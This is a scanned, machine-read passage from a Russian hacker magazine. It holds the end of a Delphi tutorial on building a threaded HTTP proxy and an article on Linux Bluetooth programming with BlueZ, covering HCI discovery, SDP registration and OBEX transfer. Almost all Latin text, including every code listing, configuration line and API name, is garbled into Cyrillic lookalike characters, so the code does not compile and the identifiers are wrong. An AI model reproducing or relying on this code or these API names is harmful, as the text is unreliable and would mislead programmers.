В остальной части формы у меня располагается ЫзіѴіеѵѵстремя колонками. 
В них мы будем отображать ІР клиентов и адреса хостов, к которым они об- 
ратились. По событию ОпСІіск для кнопки «Запустить» напиши следующий 

КОД: 

_1ізбепТкгеасі : = ТБізбепТкгеасІ. Сгеабе (баізе) ; 

Этой одной-единственной строчкой кода мы создаем новый потоктипа 
ТБІБіепТИгеаб. Потоки можно создавать приостановленными. Именно 
поэтому в качестве параметра метода Сгеаіе я передаю значение Іаізе, 
требующее немедленного запуска. 

Поток ТЫзІепТЬгеасІ подготовит со кет для прослушивания и будет ожидать 
подключений на порт8080. Код создания приведен во врезке «Поток 
ТЫзІепТЬгеасІ». 

Давай подробнее рассмотрим содержимое приведенной выше врезки. 
Процедура ЕхесіЛеО, определенная у объекта ТІізІепТНгеасІ, является ос- 
новной для потоков. После запуска потока она выполняется самой первой, 
а разтак.то именно в ней нужно расположить код, отвечающий за начало 
прослушивания определенного порта. Чтобы начать слушать порт, нужно 
создатьсокетс помощью одноименной функции зоскеШ. Параметры, необ- 
ходимые для работы функции, определяются исходя из того, какой протокол 
мы будем использовать. НТТР-проксикдолжен задействоватьТСР/ІР-про- 
токол, обеспечивающий надежную передачу данных. Поэтому во втором 
параметре я указываю 50СК_5ТРЕАМ. 

Создав сокет, нужно убедиться, что после выполнения функции Зоскеі не 
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Успешное конфигурирование Орега 

произошла ошибка. Для проверки достаточно сравнить переменную сокета 
со значением константы ІІ\ІѴА6Ю_50СКЕТ. Если они окажутся равными, то 
произошла ошибка и дальнейшее выполнение программы бессмысленно. 
Предположим, что сокетуспешно создался, а значит, следующим шагом бу- 
дет заполнение структуры зоскасісі г_і п , содержащей необходимые данные 
для начала прослушивания. Подробное описание всех свойств структуры я 
уже приводил, поэтому сейчас не буду заострять на этом внимание. Запол- 
нив все свойства структуры, ее нужно связать с нашим сокетом с помощью 
функции В I N 0 . Если функция В I N 0 выполнилась без ошибок, то надо вы- 
звать функцию для начала прослушивания — біз1:еп. После ее выполнения 
запускается бесконечный цикл, в котором вызывается функция ассерШ. 
Успешное ее выполнение будет означать, что к нам подсоединился клиент, 
и для работы с ним необходимо создать новый поток. В потоке ТСІІепіТЬгеасІ 
будет происходить обмен данными между клиентом и нашим прокси ком 
и, соответственно, между проксиком и удаленным сервером. Основной 
код потока ТСИепіТИгеасІ приведен во врезке, а полную версию ты всегда 
можешь посмотреть на нашем диске. 

Этот код получился чуть больше по размеру, но сложного в нем ничего нет, 
в чемты сейчасубедишься. Длятого чтобы разобраться в этом листинге, 
придется вспомнить алгоритм работы нашей программы, который мы об- 
суждали в самом начале статьи. Установив соединение с клиентом, нужно 
сразу получить от неготекстзапроса, в котором определен адрес запраши- 
ваемого документа. Чтение данных из сокета происходит функцией Песѵ(), 
описание которой я приводил. 

Получивтекстзапроса, нужно выдернуть из негозначение атрибута «хост». 
По этому значению мы сможем получить адресудаленного сервера, кото- 
рому и будем отправлять запрос пользователя. Если иззапроса удалось 
выделить адрес хоста, нужно начинать подготавливать сокет для установки 
соединения с ѵѵеЬ-сервером, в противном случае отправить пользователю 
сообщениетипа «Ошибка в запросе». Для установки соединения нужно 
заполнитьуже знакомую нам структурутипа зоскасИНп и выполнить 
функцию СоппесШ. 

Кактолько соединение будет установлено, нужно перевести сокет в 
асинхронный режим. Смена режима происходите помощью функции 
веізоскорШ. Перевод в асинхронный режим необходим, поскольку в та ком 
случае нехило повысится производительность нашего приложения. Это 
станет возможным из-за минимизации задержек перед пересылкой данных 
между нами, ѵѵеЬ-сервером и клиентом. Получив от сервера порцию дан- 
ных, мы не будем ждать остальных, а будем сразу отправлять ее клиенту. 
Итак, переведя сокет в асинхронный режим, можно смело отправлятьсер- 
веру запрос, ранее полученный от клиента и запускать бесконечный цикл, 
в котором будет реализован обмен данным. Перед тем какчитать данные, 
нужно добавить сокеты в набор для ожидания. Какты помнишь, после мы 



Код потока 
ТСНепгТЬгеаб 



ѵаг 

_Ьибб: аггау [0..1024] об сЬаг; 

_рогб : іпбедег; 

_гедиезб : збгіпд; 

_згѵАскіг : зоскасЫг_іп; 

_згѵЗоскеб : ТЗоскеб; 

_тосІе, _зіге : Іпбедег; 

_бЬзеб : ТЕБЗЕТ; 

Ьедіп 

Еесѵ (_с1іепб , _Ьибб, 1024, 0); 

_гедиезб : =збгіпд (_Ъибб) ; 

_гедиезб= ' ' бЬеп Ьедіп 
СІозеЗоскеб (_с1іепб) ; 

ехіб ; 
еп<Ь; 

_бюзб : =Сору (_гедиезб , Роз('Нозб: _гедиезб) , 255); 

Беіебе (_Ьозб , Роз (#13, _Ьозб) , 255); 

Беіебе (_Ьозб , 1, б); 

_^югб:=ЗбгТоІпбБеб (Сору (_Ьозб, Роз ( ' : ' , _Ьозб)+1, 255) , 80) ; 
Беіебе (_Ьозб , Роз ( ' : ' , _Ьозб) , 255) ; 
іб (_Ьозб= ' ') бЬеп Ьедіп 

ЗепЬЗбг (_с1іепб , ' <Ы>Еггог 400 : ІпѵаІіЬ ЬеасІег</Ъ2> ' ) ; 
СІозеЗоскеб (_с1іепб) ; 

ехіб; 

епО; 

ЗупсЬгопіге (аскЗТоЬод) ; 

_згѵЗоскеб := зоскеб (АЕ_ІЫЕТ, ЗОСК_ЗТКЕАМ, 0) ; 

_згѵА(Мг . зіп_асі(іг . з_а(Мг : = Ьбопі ( ШАВБК_АЫУ) ; 
_згѵА(1(1г. зіп_баші1у :=АЕ_ІЬЕТ; 

_згѵА(1сЗг . зіп_рогб := Ьбопз (_рогб ) ; 

_згѵА(1сЗг . зіп_асі(1г : = ЬоокирЫаше (_Ьозб ) ; 
іб соппесб (_згѵЗоскеб , _згѵАЬ(1г, 

зігеоб (_згѵАсісіг) ) =ЗОСКЕТ_ЕЕКОК бЬеп Ьедіп 
ЗепЬЗбг (_С1іепб, '<Ы>Еггог 404: ЮТ ЕОиЫВ</Ы>' ) ; 
ехіб ; 
епО; 

тосіе : = 1 ; 

зебзоскорб (_згѵЗоскеб , ІРРКОТО_ТСР, ТСР_ЮБЕЬАУ , 

@_шо(1е, зігеоб ( іпбедег) ) ; 
зепЬ (_згѵЗоскеб , _Ьибб, збгіеп (_Ьибб) , 0) ; 

П... продолжение на диске 

сможем проверять готовность сокета с помощью функции ЗеІесШ- 
Ну а дальше все просто. Остается только сделать проверки сокетов. Если 
запрос пришел от клиента, то перенаправляем его ѵѵеЬ-серверу; если от 
сервера, то, наоборот, отправляем его клиенту. Для проверки я запустил 
созданный проксику себя на компе, сконфигурировал Орега и попробовал 
зайти на один из сайтов локальной сети, пользователем которой я явлюсь. 
После отправки запроса моя опера шустренько начала принимать данные 
от прокси-сервера. Тем временем бізбѴіеѵѵ стал заполняться моим ІР и 
адресом хоста, к которому я посылал запрос. 

^СЛУХОВОЕ ОКНО ПРОРУБЛЕНО 

Надеюсь, сегодняшний пример получился достаточно полезным как для 
программиста, так и для хакера. В очередной разты убедился, что ОеІрЫ 
— это нетолько базы данных и отчеты, но и язык, с помощью которого можно 
решать как прикладные, так и хакерские задачи. Мне остается только 
пожелать тебеуспешного применения полученныхзнаний в своих будущих 
проектах, т 
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В наш век беспроводных технологии устраивать путаницу из проводов уже давно не мод- 



но. В арсенале пользователя имеется набор хорошо зарекомендовавших себя технологии 



цля передачи данных посредством радиоканалов, и Вшеіхют занимает в нем не послед- 



нее место. Протокол ВшеШот достаточно интересен и необычен с точки зрения програм- 



миста, поэтому сегодня хотелось бы поговорить о написании приложений под Ілпих с его 






г КРАТКИЙ ОБЗОР ВШЕТООТН-СТЕКА 

В1ие*оо*Н~стек сильно отличается от привычных протоколов своей структу- 
рой. Фактически, если проводитьаналогии сТСР/ІР, он включает нетолько 
п акетную и канальную логику, но и группы серверов и клиентов, выполняю- 
щие различные задачи. 

Протокол открыт, он был разработан в 1 994 году компанией Егісзвоп, на 
данный момент стандартизацией спецификаций занимается ВІиеФоіЬ 
БресіаІІШегез* бгоир (516). Путь развития протокола насчитывает шесть 
обратно совместимых версий: 1 .0, 1 .0 В , 1 .1 , 1 .2, 2.0 и 2.1 . 

Радиотракт В1ие*оо*Ь работает в диапазоне 2,4—2,48 ГГц, свободном от 
лицензирования, его еще называют І5М -диапазон (Іпсіизіху, Зсіепсе апб 
Мебісіпе). Для модуляции применяется алгоритм ГН55 (Егедиепсу Норріпд 
ЗргеасІ 5рес*гит — широкополосный сигнал по методу частотных скачков), 
он прост в реализации и предоставляет достаточную помехозащищенность. 
Большинство потребительских устройств маломощны и позволяютустанав- 
ливать связь в радиусе до 1 0 метров со скоростью передачи 1 -3 Мбит/сек. 
Сточки зрения прикладного программиста, на нижнем уровне стоит слой 
НСІ (Ноз* Сопігоііег ІпіеНасе), онуправляет канальными соединениями, и 
здесь можно провести аналогию с Еібегпеі. Далее данные обрабатываются 
пакетным протоколом Г2САР (Бодісаі Ыпк СопФоІапб Абаріаііоп Ргоіосоі), 



его можно представить каксмесь ІР+ІЮР+СЮ5, с его помощью все вы- 
шестоящие слои осуществляют пакетную передачу. Выше стоит поточный 
протокол ВЕСОМ М, пришедший из ІРйА; его можно описать какТСР оѵег 
Р5232. И самый высокоуровневый протокол — это ОВЕХ (ОЬІесІ Ехсбапде), в 
стеке ТСР/ІР нетего аналогов. 

Сторонней веткой от Б2САР отходитЗБР (Зегѵісе Оівсоѵегу Ргоіосоі). 
Фактически это сложный сервер, позволяющий запрашивать и реги- 
стрировать на себе профили, описывающие возможности устройства. 
Для наглядности перечислю наиболее распространенные профили, 
одобренные 516: 

бепегіс Ассезз РгоШе (САР) — описывает, как использовать низкоуровне- 
вые протоколы. Все ВІиеФоіЬ-устройства имеют реализацию САР 

Бегѵісе бізсоѵег Арріісаііоп РгоШе (5йАР) — описывает возможности 
данногоЗОР. 

Бегіаі Рог* РгоШе (5РР) — описывает параметры для эмуляции Р5232 
поверх РЕСОММ или І_2САР. 

біаі-ир Ме*ѵѵогкіпд РгоШе ( О Г) N Р) — описывает параметры для эмуляции 
АТ-модема поверх САР и 5РР. 

бепегіс ОЬ]ес* ЕхсЬапде РгоШе (СОЕР) — описываеттранспортные пара- 
метры ОВЕХ. 
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Ищем устройства через НСІ 



ОЬ]ес* РизЬ РгоШе (ОРР) — описывает параметры для приема и передачи 
простых объектов поверх 60ЕР 

Рііе Тгапз^ег РгоЛІе (РТР) — описывает параметры для приема и переда- 
чи сложных объектов (включая навигацию по файловой системе) поверх 
60ЕР/0РР 

БупсЬгопііаІіоп РгоШе (5Р) — описывает параметры для синхронизации, 
аналогичной ІгМС в ІРОА. 

г РЕАЛИЗАЦИЯ ВШЕТООТН-СТЕКА В 1ШЦХ 

В современных дистрибутивах Ѳ N ЦІ/Еі п их поддержка ВІиеІюоЙі предостав- 
лена инициативой ВІиеЕ как на уровне ядра, так и в изегврасе. 
Распространенные дистрибутивы уже содержат ВІиеЕ в ядре. Если ядро 
собирается самостоятельно, необходимо сконфигурировать его следую- 
щим образом: 

КеРъгогкіпд . . . 

<*> ВІиеРооРЪ. зиЬзузРет зиррогР . . . 

<М> Ь2САР ргоРосоІ зиррогР 
<М> 8СО Ііпкз зиррогР 
<М> КРСОММ ргоРосоІ зиррогР 
[ * ] КРСОММ ТТУ зиррогР 
<М> ВЫЕР ргоРосоІ зиррогР 
[*] МиІРісазР РіІРег зиррогР 
[*] РгоРосоІ РіІРег зиррогР 
<М> НІБР ргоРосоІ зиррогР 
ВІиеРооРЬ сіеѵісе бгіѵегз . . . 

<М> НСІ 63В бгіѵег 
[*] ЗСО (ѵоісе) зиррогР 
<М> НСІ ТРАКТ сігіѵег 
[*] ТРАКТ (Н4) ргоРосоІ зиррогР 
[*] ВС5Р ргоРосоІ зиррогР 
[*] ТгапзшіР СКС чліРЬ. еѵегу ВСЗР раскеР 
<М> Поддержка драйверов для ваших устройств 
<М> НСІ ѴНСІ (ѴігРиаІ НСІ сіеѵісе) сігіѵег 

Но, как мыужезаметили ранее, ВІиеІооіЬ представляет собой разветвлен- 
ный веерный стек, поэтому одной только поддержки на уровне ядра недос- 
таточно. Для поддержки на уровне изегврасе нам понадобятся следующие 
пакеты: 

Ыиез-иРіІз 
Ыиег-ІіЬз 
Ыиег - 1 іЬз -сіеѵеі 
оЪехРРр 



Теперь можно приступать к конфигурированию сервисов. За уровень НСІ 
отвечает демон Ьсіб, в процессе выполнения он управляется с помощью 
утилит Ьсісопіід/Ьсііооі, при старте читает конфигурацию из файла /еіс/ 
ЫиеІооіИ/Исіб.сопЕ Приведу его унифицированное содержание: 

орРіопз { 

# Автоматически инициализируем новые устройства 
аиРоіпіР уез; 

# В качестве РШ всегда используем параметр раззкеу 
зесигіру аиРо; 

# Разрешаем множественное подключение 
раігіпд тиІРі; 

# В качестве РШ используем это 

# Когда внешнее устройство спросит при соединении, 

# вводить нужно именно это 
раззкеу " 1234 м ; 

} 

сіеѵісе { 

# Имя компьютера 

паше "Хакер ЫиеРооРЬ. Ьох" ; 

# Класс устройства, эта комбинация означает, что мы 
поддерживаем 

# сеть и передачу объектов , являясь десктопным 
компьютером 

сіазз 0x120104; 

# Разрешаем все виды сканирования 
ізсап епаЫе; рзсап епаЫе; 

# Всегда принимаем входящие соединения 
1т ассерр; 

# Разрешаем все состояния в режиме соединения 
1р гзтРсЬ.,Ь.о1сІ, зпіРР ,рагк; 

# Становимся всегда доступными для обнаружения 
бізсоѵРо 0 ; 

} 

СервисЗйРобслуживает демон збрб. В процессе выполнения онуправля- 
ется с помощью утилиты збріооі. Мы не будем выполнять его предстартовую 
конфигурацию. 

Также можно настроить поведение утилиты НсіаПасЬ с помощью файла 
/еІс/ЫиеіооіИ/Нсотпп.сопб это позволитобращаться к ПЕСОММ-профилю 
внешнего устройства как к обычному СОМ -порту: 

гРсошшО { 

# При старте сервиса стараемся сразу соединиться 
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Клиент: I 


0x80 


команда СОШЕСТ 


0x0007 


длина пакета 7 байт 


0x10 


версия ОВЕХ 1 .0 


0x00 


никакихфлагов неустановлено 


0x2000 


максимальный размер пакета (в данном случаев Кб) 


Сервер: 


0хА0 


команда 51ІССЕ55 


0x0007 


длина пакета 7 байт 


0x10 


версия ОВЕХ 1 .0 


0x00 


никакихфлагов неустановлено 


0x0800 


максимальный размер пакета (в данном случае 2 Кб) 


Клиент 


0x02 


команда РЫТ 


0x0422 


длина пакета 1058 байт 


0x01 


заголовокТЬѴдля имени файла 


0x0017 


длина ТІ_Ѵ 


0x00, Т', 0x00, А, 0x00, '6', 0x00, 




‘0’, 0x00, Т, 0x00, 7, 0x00, Т, 0x00, 




'X', 0x00, Т, 0x00, 0x00 


имя файла в кодировке ІІТЕ-16 и формате N15 


ОхСЗ 


заголовокТЬѴдля полной длины файла 


0x00006000 


полная длина файла 


0x48 


заголовокТІѴдля длины передаваемого сегмента файла 


0x0403 


длина ТІ_Ѵ передаваемого сегмента файла 


0х... 


передаваемый сегмент файла 


Сервер: 


0x90 


команда СОЫТІ N Ы Е 


0x0003 


длина пакета Збайта 


Клиент: 


0x02 


команда РЫТ 


0x0406 


длина пакета 1030 байт 


0x48 


за головокТІѴ для длины передаваемого сегмента файла 


0x0403 


длина ТЬѴ передаваемого сегмента файла 


0х... 


передаваемый сегмент файла 


Сервер: 


0x90 


команда СОМТІЫЫЕ 


0x0003 


длина пакета 3 байта 


Клиент: 


0x82 


команда РІІТ для последнего сегмента файла 


0x0406 


длина пакета 1030 байт 


0x49 


заголовокТЬѴ для длины последнего передавае- 




мого сегмента файла 


0x0403 


длина ТІ_Ѵ передаваемого сегмента файла 


0х... 


передаваемый сегмент файла 


Сервер: 


0хА0 


команда 51ІССЕ55 


0x0003 


длина пакета Збайта 


Клиент: 


0x81 


команда 0І5С0ММЕСТ 


0x0003 


длина пакета 3 байта 


Сервер: 


0хА0 


команда 51ІССЕ55 


0x0003 


длина пакета 3 байта 





Телефон передает файл нашему серверу 



сервисы, предоставляемые устройством с таким адресом; 

зсіріооі Ьгоѵѵзе Іосаі покажет сервисы, зарегистрированные на нашей 

машине; 

Ьісісі — соппес* 00:1 1 :22:33:44:55 присоединит к нам НЮ-устройство с таким 
адресом; 

рапсі --соппес* 00:1 1 :22:33:44:55 создаст Ргіѵаіе Агеа ЫеЬл/огк с внешним 

УСТРОЙСТВОМ; 

оЬехКр/оЬехКрсі помогут обмениваться файлами с внешним устройством. 
Теперь, когда административные настройки закончены, компьютер заре- 
гистрирован на всех ЫиеЬоіЬ-устройствах, имеющихся в наличии, файлы 
передаются, а адресные книги синхронизируются, я предлагаю перейти 
к программированию, чтобы понять самое интересное: как же все это 
устроено изнутри. 

Н ПРОГРАММИРОВАНИЕ МЕХАНИЗМОВ НСІ 

Любому ЫиеіооіЬ-клиенту, прежде чем соединяться с сервером, необ- 
ходимо этот самый сервер найти. Такой функционал предоставляет слой 
НСІ в виде функций управления устройством. Чтобы не заморачиваться 
тонкостями маршрутизации в ЫиеіооіЛ-сетях, мы возьмем устройство на 
маршруте поумолчанию. Также сразу откроем на нем Ьсі-сокет, он понадо- 
бится позже для запроса имени устройства: 

іпС с1еѵ_ісі = Ьсі_дек_гоике (ШЬЬ) ; 
іпС зоск = 1тсі_ореп_с1еѵ (сіеѵ_іс1) ; 

После этого можно создать специальную структуру для хранения данных 
запроса и попроситьустройство заполнить ее, при этом сбросить кэш и 
не искать больше 255устройств. В ответ получим количество найденных 

ХОСТОВ: 



Ъіпсі уез і 

# ВІиекоокЬ-адрес внешнего уст- 
ройства (к примеру, телефона) 




сіеѵісе 11:22:33:44:55:66; 

# КЕСОММ-канал , на котором уст- 
ройство предоставляет сервис 
сЬаппеІ 1; 

} 

Теперь при появлении устройства (скажем, 
телефона) мы автоматически получаем псевдо- 
дева йс/сІеѵ/НсоттО и можем его использовать, 
допустим, как модем для подъема ѲРР5 оѵег 
ВІиеІооіЬ. 

Настройка закончена, запускаем сервис 
ЫиеіооіН автоматом или вручную: ЬсісІ, зсірб и 
ИсіайасЬ, и можно проверять работоспособ- 
ность: 

ЬсісопЛд -а покажет состояние нашего 
ЫиеІооіЬ-адаптера; 

Ьсііооізсап покажет находящиеся вокруг 
ЫиеіооіЬ-устройства; 

зсіріооі Ьгоѵѵзе 00:1 1 :22:33:44:55 покажет 



іпдиігу_іп:Ё:о *іі= ( іпдиігу_іп:Е:о* )ша11ос (255 * 
зізеоТ ( іпдиігу_іпТо) ) ; 

іпС пшп_гзр = Ьсі_іпдиігу (<іеѵ_ісІ, 8, 255, ШЬЬ, &іі, 
ІКЕ0_САСНЕ_РШ8Н) ; 

Теперь можно делать перебор найденных данных. Адрес находится в поле 
ЬбасИг, класс устройства — в поле беѵ_с1а55, представляющем собой мас- 
сив из трех байт. По второму байту можно грубо определить тип: 1 — ком- 
пьютер, 2 —телефон. На самом деле класс устройства содержит намного 
большеточной и разнообразной информации, за ее интерпретацией можно 
обратиться кспецификациям. 

сЬаг аскіг [ 19 ] = {0}; 
сЬаг пате [248 ] = {0}; 

Тог ( іпТ і = 0; і<пиш_гзр; + + і) { 

Ьа2зТг (& (іі + і) ->Ьсіасі(іг , асісіг) ; 

1тсі_геа(і_гето1іе_пате ( зоск, &(іі + і) ->Ь<Та<ісіг, 
зі гео Т (пате) , пате, 0); 
ргіпТТ(" %з %з" , асісіг, пате) ; 
зміТсіі ( (іі + і) ->сіеѵ_с1азз [1] ) { 
сазе 0x01 : ргіпТТ(" [Сіазз: сотрикег] " ) ; Ьгеак; 
сазе 0x02 : ргіпТТ(" [Сіазз: рЬопе] " ) ; Ьгеак; 



► 116 



ХАКЕР 01 /109/ 08 














^ согііпд 




Описанных механизмов должно хватить для базового поиска 
устройств в сети, полноценную реализацию можно найти в 
файле сіізсоѵег.срр на диске, прилагающемся кжурналу. 

53 ПРОГРАММИРОВАНИЕ МЕХАНИЗМОВ 
БОР НА СТОРОНЕ КЛИЕНТА 

После того как клиент нашел в сети требуемый сервер, 
нужно проверить, поддерживает ли сервер искомые 
сервисы, ведь иначе соединяться с ним нет смысла, да и 
параметры соединения неизвестны. Достигнуть желае- 
мого можно средствами механизмов БОР. Сервисы можно 
искать по различным параметрам, и фактически количес- 
тво и разнообразие таковых ничем не ограничено. Я буду 
искать сервис класса ОВЕХ 0В4ЕСТ РІІ5Н и Р ЕС ОММ- ка- 
нал, которым он предоставлен. 

Для начала нам нужно соединиться судаленным устройством: 
Ьс1ас1с1г_Ь СагдеС; 

зСг2Ьа ("00:11:22:33:44: 55" , &СагдеС) ; 
зс!р_зеззіоп_Ь *зезз = зс!р_соппесС ( ВЕ>АВВК._АІ4У , 
&СагдеС , 8ВР_КЕТКУ_ІЕ_ВВ8У) ; 

Большинство параметров в ББР-операторике библиотек 
ВІиеЕ задается древовидными списками с помощью функций 
построениятаковых. Мы создадим список поиска, в который 
добавим параметр в виде искомого класса, а также создадим 
списокатрибутов поиска, в котором запросим протоколы: 

ииісМі гооС_ииі(3; 
зс!р_ииіс116_сгеаСе (&гоо1і_ииі(і / 
ОВЕХ_ОВЦРВЗН_8ѴСВА88_ІВ) ; 
зс!р_1ізЕ_Ь *зеагсЬ = 

зс!р_1ізЕ_аррепс1 ( 0 , &гооС_ииіс1) ; 
иіпС32_Ь гапде = 8ВР_АТТК_РВОТО_ВЕ8С_ЕІ8Т; 
зс!р_1ізС_Ь *аССгіс1 = 

зс!р_1ізС_аррепс1 ( 0 , &гапде) ; 



Теперь все подготовлено, чтобы сделатьБОР-запрос через 
ранее подготовленную БОР-сессию судаленным устройством 
и поместить результаты в еще один список: 

3(Тр_1ізС_'Ь *гезиІС; 

зс!р_зегѵісе_зеагс]т_а1іСг_гед ( зезз , зеагсЬ, 
5ВР_АТТК_КЕ0_ІШ)ІѴІШАЬ, аССгЮ, &гезиІС); 

Перебирая элементы результирующего списка, мы будем 
брать из нихБйР-записи, проверять, естьлитам информация 
о протоколах, и запрашивать канал РРСОММ-протокола. Если 
полученный канал больше нуля, значит мы его нашли, можно с 
ним соединяться и обмениваться данными по протоколу О ВЕХ 
ОВЗЕСТ РІІ5Н: 

іпЬ г1сотш_с]таппе1 = -1; 

Тог(/* етрЕу */;! гезиІС; гезиІС = гезиІС->пехС ) 

{ 

зс!р_1ізС_Ь *ассезз=ШЫі; 
зсір_деС_ассезз_ргоСоз ( 

( зс1р_гесогсМ: * ) гезиІС-хіаСа , &ассезз) ; 

ІТ (ассезз) г1сошш_с]гаппе1 = 

3(ір_де1і_ргоСо_рогС (ассезз , КЕСОММ_ШІВ) ; 
і! (г1сошш_с]гаппе1>0 ) Ьгеак; 

} 

Добавив разработанный функционал в код из предыдущей 
части статьи, мы можем нетолько видеть устройства вокруг 
себя, но и определять на них наличие ОРІІБН-сервиса и 
РЕСОММ-канал, на котором сервис предоставлен. 

^ПРОГРАММИРОВАНИЕ МЕХАНИЗМОВ 
БОР НА СТОРОНЕ СЕРВЕРА 

Сервер, не регистрирующий свои сервисы на локальном БОР, 
тоже никому не нужен, ведь ни один клиент не сможетузнать 
о существовании этих сервисов. Согласно разработанному 
ранее функционалу, наш сервер будет декларировать ОВЕХ 
ОВЗЕСТ РІІ5Н на девятом РЕСО ММ -канале. Для начала мы 
создадим БОР-сессию с локальным хостом и подготовим 
сервисную запись, которую позже наполним содержанием и 
зарегистрируем в этой самой сессии: 

зс!р_зеззіоп_Ь *зеззіоп=зс!р_соппесС ( 
ВВАВВК_А№Г, ВВАВВБЩЬОСАЬ , 8ВР_КЕТКУ_ІЕ_ВВЗУ) ; 
зс!р_гесогсМ: *гесогс!=зс1р_гесогс1_а11ос ( ) ; 

Теперь нужно настроить видимость нашей записи. Для этого 
зарегистрируем запись в группе, которая видна всем и всегда 
(риЫіс Ьгоѵѵзе дгоир): 

ииісМз дгр_ииіс1; 
зс!р_ииіс116_сгеаСе (&дгр_ии1й, 
РІІВЫС_ВКОѴ\І8Е_СКОІІР ) ; 
зс!р_1ізЕ_Ь *дгр = зс!р_1ізЕ_аррепс1 ( 

ШЬЬ, &дгр_ииісЗ) ; 

з0р_зеС_Ъгомзе_дгоирз (гесогсі, дгр) ; 

Далее требуется объявить протокольный стек, на котором ба- 
зируется наш сервис. Начинаем с самого низа — с протокола 
Б2САР: 

ииіс!_С 12сар_ииіс1; 

зс!р_ииіс116_сгеаСе (&12сар_ииіс1, Ь2САР_ШІВ) ; 
зс!р_1ізС_І: *12сар = зс!р_1ізС_аррепс1 ( 

ШЬЬ, &12сар_ииіс1) ; 




> Ііпкз 

ѵѵѵѵѵѵ.Ыиег.огд — оф- 
сайтЫпих Віиеіооіб 
ргоіюсоі зіаск. 
бир://орепоЬех. 
зоигсеЬгде.пеІ- 

— эти ребята делают 
открытую реализа- 
цию ОВЕХ. 
ѵѵѵѵѵѵ.ЫиеІооІіЬ. 
сот/ВІиеіооВ-і/ 
1_еагп/Тесбпо[оду/ 
Бресібсабопя 

— спецификацию на 
0РІІ5Н я раскопал 
здесь, есть еще 
много других. 




/^\ 



> іпГо 

Стек и АРІ ВІиеЕ 
сегодня — стандарт 
для Ыпих, а это 
значит, что получен- 
ные знания можно 
применять для про- 
граммирования под 
любые етЬесІсІесІ- 
устройства, осна- 
щенные Віиеіооіб и 
ОС Ыпих. 

Если кто-то подумал, 
что можно регистри- 
ровать только те 50 Р- 
атрибуты, которые 
утверждены в 510, то 
это не так. Ты можешь 
придумывать своим 
сервисамлюбые 
ШЮ’ы и регистриро- 
вать их, главное, чтобы 
было кому их искать. 
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После 62САР мы объявляем протокол РЕСОММ, на девятом канале которо- 
го наш сервис будет ожидать соединения с клиентом: 

ииісМс гРсошш_ииісі; 

з<ір_ішіс116_сгеа1іе ( &гТсотт_ииісІ, КРСОММ_ШІВ) ; 
зс!р_1ізВ_І: *гбсошш = зсір_1ізВ_аррепсІ ( 

МПЬЬ, &гбсошш_ииісі) ; 
иіпВ8_Ь гбсошш_с1таппе1 = 9; 
зсір_(іаРа_Р *сЪ.ап_с1аВа = зс!р_с1аВа_а11ос ( 

ЗВРу0'ШТ8 , &гбсошш_с]таппе1) ; 
гТсогшп = з<5р_1ізВ_аррепс1 (гТсотт, сЬап_с1аВа) ; 

И последним протоколом нужно объявить ОВЕХ, чтобы зафиксировать фор- 
мат передачи данных, ведь РЕСОММтакой фиксации не предполагает: 

ииіс1_В оЬех_ииіс1; 

зс!р_ішіс116_сгеа1іе ( &оЪех_ішіс1, ОВЕХ_ШІВ) ; 
зс!р_1ізВ_І: *оЪех = зс!р_1ізВ_арреп<і (ЫВЪБ , &оЪех_ииіс1) ; 

Чтобы покончить с протоколами, остался заключительный шаг — нужно 
объединить созданные протоколы в один списоки зарегистрироватьего в 
ЗОР-записи: 



зс!р_1ізВ_Ь *ргоВо_гооВ = зйр_1ізЦ_арреп<і (ШЫ., 
ргоВо_1ізВ) ; 

зс!р_зе1і_ассезз_ргоВоз (гесогсі, ргоВо_гооВ) ; 

Чисто технически сделанного уже достаточно, чтобы определить ад- 
ресную и форматную информацию для соединения с нашим сервером. 
Но, ксожалению, большинство реал ьных устройств не найдетэтот 
сервис без серии информационно- косметических атрибутов. Так как 
мы собираемся взаимодействовать с этими реальными устройствами, 
нам придется эти атрибуты объявить, начнем мы с идентификатора 
класса сервиса: 

ииісМ: оризЪ_ииіс1; 
зс!р_ииіс116_сгеаВе (&ориз1Ь_ииіс1, 

ОВЕХ_ОВБРВЗН_8ѴСВА88_ІВ) ; 
зс!р_1ізВ_Ь *зѵс1азз = зсір_1ізВ_аррепсІ (ШЬЬ , 

&ориз]з_ішісО ; 

зс!р_зеВ_зегѵісе_с1аззез (гесогсі, зѵсіазз) ; 

Далее нужно создать дескриптор профиля, я присвоил ему версию 1 .0, что 
вполне работает при практическом использовании (хотя честнее бы было 
0.1): 

зсір_ргоТі1е_сіезс_Ц ргобііе; 
зс!р_ииіс116_сгеаВе (&ргоТі1е .ииісі, 
ОВЕХ_ОВЦРиЗН_РКОРІЬЕ_ІБ) ; 
ргобііе . ѵегзіоп = 0x0100; 
зс!р_1ізВ_1і *ргоТ_1ізД = зс!р_1ізВ_аррепс1 ( 

ШЬЬ, &рго!і1е) ; 

зс!р_зеВ_ргоТі1е_с1езсз (гесогсі, ргоТ_1ізД) ; 

Ксожалению, и этого на практике оказалось недостаточно. Многиеуст- 
ройства желают видеть списоктипов объектов, которые наш сервер может 
принимать. Так как я собираюсь оперировать объектами как бинарными 
файлами, я решил не скромничать и добавил все типы, которые я знаю 
(кстати, достаточно нетривиальная для понимания операция): 

иіпЪ8_Ь ТогтаВз[] = { 0x01, 0x02, 0x03, 0x04, 

0x05, 0x06, ОхРР } ; 

ѵоіО *сШс1з [ зігеоі ( ТогтаВз ) ] , *ѵа1иез [ зігеоі ( ТогтаВз ) ] ; 
иіпВ8_В ОВЗ = ЗВР_1ЛМТ8 ; 

Тог (зіге_В і=0; і<зі геоВ ( ВогтаВз ) ; ++і) { 
сіВсіз [і] = &сІВс1; 
ѵа1иез[і] = &ВогтаВз [ і ] ; 

} 

зс!р_с1аВа_В *зВ1ізВ = зс!р_зед_а11ос (сіВсіз , 
ѵаіиез, зігеоВ ( ВогтаВз ) ) ; 
зс!р_аВВг_ас1сі ( гесогсі , 

8ВР_АТТК_ЗВРРОКТЕВ_РОКМАТ8_ЫЗТ, зВІІзВ) ; 

Мы почти подошли к концу, но от следующего шага трудно удержаться, хоть 
он и совсем не обязателен. Чтобы наш сервис не был безымянным, нужно 
датьемусимвольное имя: 

зс!р_зеВ_іпВо_аВВг (гесогсі, "ОВЕХ ОВдесВ РизЬ. [ХаКеР 
ЕсІіВіоп] " , ШЬЬ, ШЬЬ) ; 

Теперь все готово ктому, чтобы зарегистрировать в ЗОР-сессии нашу сер- 
висную запись, которую мы такдолго и старательно конфигурировали: 

з0р_с!еѵісе_гесогс1_гедізВег ( зеззіоп, 

ВВАВВК_АБУ, гесогО, 0); 



